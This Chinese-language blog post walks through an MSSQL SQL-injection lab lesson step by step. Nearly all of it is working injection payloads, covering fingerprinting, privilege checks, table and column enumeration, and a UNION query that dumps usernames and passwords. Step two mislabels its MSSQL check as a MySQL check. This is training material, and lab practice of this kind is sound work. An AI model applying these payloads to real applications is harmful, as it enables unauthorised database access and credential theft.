less-1
步骤一:判断注入方式 ?id=1' --+
步骤二:判断后台是否是MYSQL数据库
?id=1' and exists(select * from sysobjects) --+
步骤三:查询数据库信息,user回显的dbo表示是最⾼权限,如果是⽤户的名字表示是普通权限
?id=-1' union select 1,user,is_srvrolemember('public'); --+
步骤四:查询表名
第一张表:?id=-1'and (select top 1 cast (name as varchar(256)) from(select top 2 id,name from [sysobjects] where xtype=char(85) and status!=1 order by id)t order by id desc)=1--+
第二张表:?id=-1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users')--+
第三张表:?id=-1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users' and name !='emails')--+
第四张表:?id=-1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users' and name !='emails' and name !='uagents')--+
第五章表为空:?id=-1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users' and name !='emails' and name !='uagents' and name !='referers')--+
步骤五:显示字段信息
?id=1' having 1=1--
第二个字段 ?id=1' group by id having 1=1--
第三个字段 ?id=1' group by id,username having 1=1--
步骤六:查询字段值
1'order by 3-- //回显正常 1'order by 4-- //回信错误
找出回显值:-1'union select 1,2,3 from users--
得出用户名密:?id=-1'union select 1,username,password from users--
标签:name,--,top,id,Labs,SQLi,--+,MSSQL,select
From: https://blog.csdn.net/2301_82061181/article/details/141358934